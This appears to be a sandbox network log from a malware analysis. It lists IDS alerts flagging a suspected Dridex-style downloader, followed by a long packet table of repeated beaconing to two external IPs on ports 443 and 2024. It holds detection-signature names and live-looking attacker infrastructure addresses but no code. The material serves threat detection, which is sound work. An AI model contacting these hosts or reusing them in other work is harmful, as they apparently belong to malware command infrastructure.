2024-12-18T13:45:40.598925+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49849 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:42.175675+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49855 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:43.032789+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49855 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:44.633871+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49861 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:45.355222+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49861 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:47.273710+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49867 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:48.150899+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49867 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:49.799807+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49878 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:50.527844+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49878 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:52.148792+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49883 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:52.835125+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49883 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:54.395265+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49889 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:55.077137+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49889 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:56.835103+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49894 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:57.544183+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49894 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:59.123987+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49900 | 188.119.66.185 | 443 | TCP
2024-12-18T13:45:59.807945+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49900 | 188.119.66.185 | 443 | TCP
2024-12-18T13:46:01.600396+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49905 | 188.119.66.185 | 443 | TCP
2024-12-18T13:46:02.411736+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49905 | 188.119.66.185 | 443 | TCP
2024-12-18T13:46:04.210833+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49911 | 188.119.66.185 | 443 | TCP
2024-12-18T13:46:04.897599+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49911 | 188.119.66.185 | 443 | TCP
2024-12-18T13:46:06.464108+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49918 | 188.119.66.185 | 443 | TCP
2024-12-18T13:46:07.434640+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.4 | 49918 | 188.119.66.185 | 443 | TCP
2024-12-18T13:46:09.283893+0100 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.4 | 49924 | 188.119.66.185 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 18, 2024 13:44:57.102277994 CET | 49737 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:44:57.102325916 CET | 443 | 49737 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:44:57.102430105 CET | 49737 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:44:57.118235111 CET | 49737 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:44:57.118252039 CET | 443 | 49737 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:44:58.587399960 CET | 443 | 49737 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:44:58.587502956 CET | 49737 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:44:58.643404961 CET | 49737 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:44:58.643423080 CET | 443 | 49737 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:44:58.643801928 CET | 443 | 49737 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:44:58.643909931 CET | 49737 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:44:58.647500038 CET | 49737 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:44:58.691334963 CET | 443 | 49737 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:44:59.321211100 CET | 443 | 49737 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:44:59.321288109 CET | 443 | 49737 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:44:59.321340084 CET | 49737 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:44:59.321340084 CET | 49737 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:44:59.323084116 CET | 49737 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:44:59.323096991 CET | 443 | 49737 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:44:59.324214935 CET | 49743 | 2024 | 192.168.2.4 | 46.8.225.74
Dec 18, 2024 13:44:59.444268942 CET | 2024 | 49743 | 46.8.225.74 | 192.168.2.4
Dec 18, 2024 13:44:59.447596073 CET | 49743 | 2024 | 192.168.2.4 | 46.8.225.74
Dec 18, 2024 13:44:59.447662115 CET | 49743 | 2024 | 192.168.2.4 | 46.8.225.74
Dec 18, 2024 13:44:59.567269087 CET | 2024 | 49743 | 46.8.225.74 | 192.168.2.4
Dec 18, 2024 13:44:59.567341089 CET | 49743 | 2024 | 192.168.2.4 | 46.8.225.74
Dec 18, 2024 13:44:59.686904907 CET | 2024 | 49743 | 46.8.225.74 | 192.168.2.4
Dec 18, 2024 13:45:00.700681925 CET | 2024 | 49743 | 46.8.225.74 | 192.168.2.4
Dec 18, 2024 13:45:00.755702019 CET | 49743 | 2024 | 192.168.2.4 | 46.8.225.74
Dec 18, 2024 13:45:02.710823059 CET | 49755 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:02.710875034 CET | 443 | 49755 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:02.710999012 CET | 49755 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:02.711287022 CET | 49755 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:02.711304903 CET | 443 | 49755 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:04.162280083 CET | 443 | 49755 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:04.162347078 CET | 49755 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:04.162802935 CET | 49755 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:04.162817001 CET | 443 | 49755 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:04.162981033 CET | 49755 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:04.162992954 CET | 443 | 49755 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:04.886327982 CET | 443 | 49755 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:04.886403084 CET | 443 | 49755 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:04.886468887 CET | 49755 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:04.886470079 CET | 49755 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:04.886811018 CET | 49755 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:04.886826992 CET | 443 | 49755 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:05.008225918 CET | 49761 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:05.008277893 CET | 443 | 49761 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:05.008407116 CET | 49761 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:05.008824110 CET | 49761 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:05.008846998 CET | 443 | 49761 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:06.653121948 CET | 443 | 49761 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:06.653285027 CET | 49761 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:06.653889894 CET | 49761 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:06.653898001 CET | 443 | 49761 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:06.654012918 CET | 49761 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:06.654020071 CET | 443 | 49761 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:07.341058969 CET | 443 | 49761 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:07.341129065 CET | 443 | 49761 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:07.341161966 CET | 49761 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:07.341180086 CET | 49761 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:07.341423035 CET | 49761 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:07.341442108 CET | 443 | 49761 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:07.343041897 CET | 49767 | 2024 | 192.168.2.4 | 46.8.225.74
Dec 18, 2024 13:45:07.462650061 CET | 2024 | 49767 | 46.8.225.74 | 192.168.2.4
Dec 18, 2024 13:45:07.462738037 CET | 49767 | 2024 | 192.168.2.4 | 46.8.225.74
Dec 18, 2024 13:45:07.462810040 CET | 49767 | 2024 | 192.168.2.4 | 46.8.225.74
Dec 18, 2024 13:45:07.462918997 CET | 49767 | 2024 | 192.168.2.4 | 46.8.225.74
Dec 18, 2024 13:45:07.570100069 CET | 49768 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:07.570136070 CET | 443 | 49768 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:07.570219994 CET | 49768 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:07.570549011 CET | 49768 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:07.570564032 CET | 443 | 49768 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:07.582505941 CET | 2024 | 49767 | 46.8.225.74 | 192.168.2.4
Dec 18, 2024 13:45:07.624403000 CET | 2024 | 49767 | 46.8.225.74 | 192.168.2.4
Dec 18, 2024 13:45:08.435575008 CET | 2024 | 49767 | 46.8.225.74 | 192.168.2.4
Dec 18, 2024 13:45:08.435698986 CET | 49767 | 2024 | 192.168.2.4 | 46.8.225.74
Dec 18, 2024 13:45:09.025648117 CET | 443 | 49768 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:09.025804996 CET | 49768 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:09.026287079 CET | 49768 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:09.026294947 CET | 443 | 49768 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:09.026498079 CET | 49768 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:09.026503086 CET | 443 | 49768 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:09.711090088 CET | 443 | 49768 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:09.711155891 CET | 443 | 49768 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:09.711211920 CET | 49768 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:09.711236000 CET | 49768 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:09.711417913 CET | 49768 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:09.711431026 CET | 443 | 49768 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:09.820293903 CET | 49774 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:09.820341110 CET | 443 | 49774 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:09.820440054 CET | 49774 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:09.820810080 CET | 49774 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:09.820823908 CET | 443 | 49774 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:11.275789022 CET | 443 | 49774 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:11.275908947 CET | 49774 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:11.287760019 CET | 49774 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:11.287775040 CET | 443 | 49774 | 188.119.66.185 | 192.168.2.4
Dec 18, 2024 13:45:11.287931919 CET | 49774 | 443 | 192.168.2.4 | 188.119.66.185
Dec 18, 2024 13:45:11.287938118 CET | 443 | 49774 | 188.119.66.185 | 192.168.2.4
                                                                                          Dec 18, 2024 13:45:11.970408916 CET44349774188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:11.970488071 CET49774443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:11.970504045 CET44349774188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:11.970555067 CET49774443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:11.970761061 CET49774443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:11.970783949 CET44349774188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:12.085696936 CET49780443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:12.085757017 CET44349780188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:12.085828066 CET49780443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:12.086061954 CET49780443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:12.086076975 CET44349780188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:13.603264093 CET44349780188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:13.603425026 CET49780443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:13.603914976 CET49780443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:13.603928089 CET44349780188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:13.604132891 CET49780443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:13.604139090 CET44349780188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:14.300154924 CET44349780188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:14.300226927 CET49780443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:14.300240040 CET44349780188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:14.300280094 CET49780443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:14.300472975 CET49780443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:14.300528049 CET44349780188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:14.300597906 CET49780443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:14.414021969 CET49786443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:14.414068937 CET44349786188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:14.414211035 CET49786443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:14.414464951 CET49786443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:14.414486885 CET44349786188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:15.872772932 CET44349786188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:15.872940063 CET49786443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:15.875063896 CET49786443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:15.875072002 CET44349786188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:15.876138926 CET44349786188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:15.876300097 CET49786443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:15.876722097 CET49786443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:15.923326015 CET44349786188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:16.712157011 CET44349786188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:16.712245941 CET44349786188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:16.712272882 CET49786443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:16.712363958 CET49786443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:16.712512016 CET49786443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:16.712528944 CET44349786188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:16.822554111 CET49792443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:16.822593927 CET44349792188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:16.822700977 CET49792443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:16.823117971 CET49792443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:16.823137999 CET44349792188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:18.301151037 CET44349792188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:18.301990986 CET49792443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:18.301990986 CET49792443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:18.301990986 CET49792443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:18.302010059 CET44349792188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:18.302026033 CET44349792188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:18.985004902 CET44349792188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:18.985078096 CET44349792188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:18.985104084 CET49792443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:18.985122919 CET49792443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:18.985392094 CET49792443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:18.985426903 CET44349792188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:19.101720095 CET49797443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:19.101768970 CET44349797188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:19.101843119 CET49797443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:19.102178097 CET49797443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:19.102193117 CET44349797188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:20.934287071 CET44349797188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:20.934362888 CET49797443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:20.934915066 CET49797443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:20.934926033 CET44349797188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:20.935201883 CET49797443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:20.935210943 CET44349797188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:21.691534042 CET44349797188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:21.691613913 CET44349797188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:21.691633940 CET49797443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:21.691664934 CET49797443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:21.691813946 CET49797443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:21.691836119 CET44349797188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:21.804702044 CET49807443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:21.804739952 CET44349807188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:21.804831028 CET49807443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:21.805080891 CET49807443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:21.805098057 CET44349807188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:23.260077000 CET44349807188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:23.260152102 CET49807443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:23.260694981 CET49807443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:23.260711908 CET44349807188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:23.261008024 CET49807443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:23.261015892 CET44349807188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:23.945014954 CET44349807188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:23.945084095 CET49807443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:23.945096970 CET44349807188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:23.945142984 CET49807443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:23.946147919 CET49807443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:23.946168900 CET44349807188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:24.054466009 CET49814443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:24.054522991 CET44349814188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:24.054630995 CET49814443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:24.054871082 CET49814443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:24.054886103 CET44349814188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:25.702842951 CET44349814188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:25.702930927 CET49814443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:25.703381062 CET49814443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:25.703392029 CET44349814188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:25.703584909 CET49814443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:25.703589916 CET44349814188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:26.388659000 CET44349814188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:26.388729095 CET44349814188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:26.388744116 CET49814443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:26.388799906 CET49814443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:26.388955116 CET49814443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:26.388974905 CET44349814188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:26.507657051 CET49819443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:26.507700920 CET44349819188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:26.507860899 CET49819443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:26.508315086 CET49819443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:26.508328915 CET44349819188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:28.009932995 CET44349819188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:28.010091066 CET49819443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:28.010505915 CET49819443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:28.010512114 CET44349819188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:28.010744095 CET49819443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:28.010746956 CET44349819188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:28.718947887 CET44349819188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:28.719039917 CET49819443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:28.719058990 CET44349819188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:28.719119072 CET49819443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:28.719145060 CET44349819188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:28.719208002 CET49819443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:28.719274044 CET49819443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:28.719293118 CET44349819188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:28.835808992 CET49825443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:28.835855007 CET44349825188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:28.835988045 CET49825443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:28.836177111 CET49825443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:28.836191893 CET44349825188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:30.289798021 CET44349825188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:30.289916992 CET49825443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:30.290400982 CET49825443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:30.290410042 CET44349825188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:30.290555000 CET49825443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:30.290560961 CET44349825188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:30.977081060 CET44349825188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:30.977236032 CET49825443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:30.977262020 CET44349825188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:30.977317095 CET49825443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:30.977333069 CET44349825188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:30.977396965 CET49825443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:30.977551937 CET49825443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:30.977567911 CET44349825188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:31.086152077 CET49831443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:31.086178064 CET44349831188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:31.086354017 CET49831443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:31.086879969 CET49831443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:31.086891890 CET44349831188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:32.568747044 CET44349831188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:32.568917036 CET49831443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:32.569350958 CET49831443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:32.569360018 CET44349831188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:32.569540024 CET49831443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:32.569545031 CET44349831188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:33.376884937 CET44349831188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:33.376961946 CET44349831188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:33.377016068 CET49831443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:33.377017021 CET49831443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:33.377207994 CET49831443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:33.377221107 CET44349831188.119.66.185192.168.2.4
                                                                                          Dec 18, 2024 13:45:33.491982937 CET49837443192.168.2.4188.119.66.185
                                                                                          Dec 18, 2024 13:45:33.492019892 CET44349837188.119.66.185192.168.2.4
